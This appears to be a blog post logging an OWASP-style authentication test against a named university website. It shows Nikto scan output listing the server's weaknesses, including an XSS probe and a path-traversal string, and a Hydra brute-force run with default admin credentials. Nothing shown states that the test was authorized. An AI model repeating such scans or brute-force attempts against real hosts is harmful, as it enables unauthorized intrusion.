not found
<Testing for user enumeration (OWASP-AT-002)>
>>we are test for valid user/right password
>>now i will try to insert a invalid userID and wrong password
>>before we guest the password default, we search where the login admin interface with nikto
- ***** SSL support not available (see docs for SSL install) *****
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 110.76.151.4
+ Target Hostname: www.akakom.ac.id
+ Target Port: 80
+ Start Time: 2011-06-05 14:32:56
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.3.5
+ robots.txt contains 14 entries which should be manually viewed.
+ ETag header found on server, inode: 5594158, size: 11692, mtime: 0x963c12c0
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /error_log: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpMyAdmin/: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 2 error(s) and 22 item(s) reported on remote host
+ End Time: 2011-06-05 14:46:34 (818 seconds)
---------------------------------------------------------------------------
we found the login for phpmyadmin
While we are trying to breakthrough in php my admin, the server was drop down with mysql server error
<Brute Force Testing (OWASP-AT-004)>
>>we use hydra to brute-force
>>we use hydra to brute-force
Hydra v6.3 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-06-05 13:03:22
[DATA] 3 tasks, 1 servers, 3 login tries (l:1/p:3), ~1 tries per task
[DATA] attacking service http-get on port 80
[VERBOSE] Resolving addresses ... done
[DEBUG] Code: attack Time: 1307253802
[DEBUG] Options: mode 48 ssl 1 restore 0 showAttempt 0 tasks 3 tnp 1 tpsal 1 exit_found 0 miscptr /foo/bar/protected.html service http-get
[DEBUG] Brains: active 0 targets 1 finished 0 todo_all 3 todo 3 sent 0 found 0 countlogin 1 sizelogin 6 countpass 3 sizepass 6
[DEBUG] Target 0 - target www.akakom.ac.id ip 110.76.151.4 login_no 0 pass_no 0 sent 0 pass_state 0 use_count 0 max_use_count 255 done 0 fail_count 0 login_ptr admin pass_ptr admin
[DEBUG] Task 0 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[DEBUG] Task 1 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[DEBUG] Task 2 - pid 0 active 0 redo 0 current_login_ptr (null) current_pass_ptr (null)
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 3.
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "" - child 0 - 1 of 3
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "admin" - child 1 - 2 of 3
[DEBUG] pass_state: 2 login_no: 0 pass_no: 2 (countlogin: 1 countpass:3)
[STATUS] attack finished for www.akakom.ac.id (waiting for children to finish)
[ATTEMPT] target www.akakom.ac.id - login "admin" - pass "" - child 2 - 4 of 3
DEBUG_CONNECT_OK
DEBUG_CONNECT_OK
DEBUG_CONNECT_OK
Error: SSL Connect 0
Error: SSL Connect 0
Error: SSL Connect 0
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10686 terminating, can not connect
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10685 terminating, can not connect
Could not create an SSL session: error:00000000:lib(0):func(0):reason(0)
Error: Child with pid 10684 terminating, can not connect
Hydra (http://www.thc.org/thc-hydra) finished at 2011-06-05 13:03:23
<finished>
<Testing for bypassing authentication schema (OWASP-AT-005)>
<Testing for vulnerable remember password and pwd reset (OWASP-AT-006)>
>>this site has facility forgot password for his member's
<Testing for Logout and Browser Cache Management (OWASP-AT-007)>
<Testing for CAPTCHA (OWASP-AT-008)>
not found
not found
<Testing Multiple Factors Authentication (OWASP-AT-009)>
<Testing for Race Conditions (OWASP-AT-010)>
Post a Comment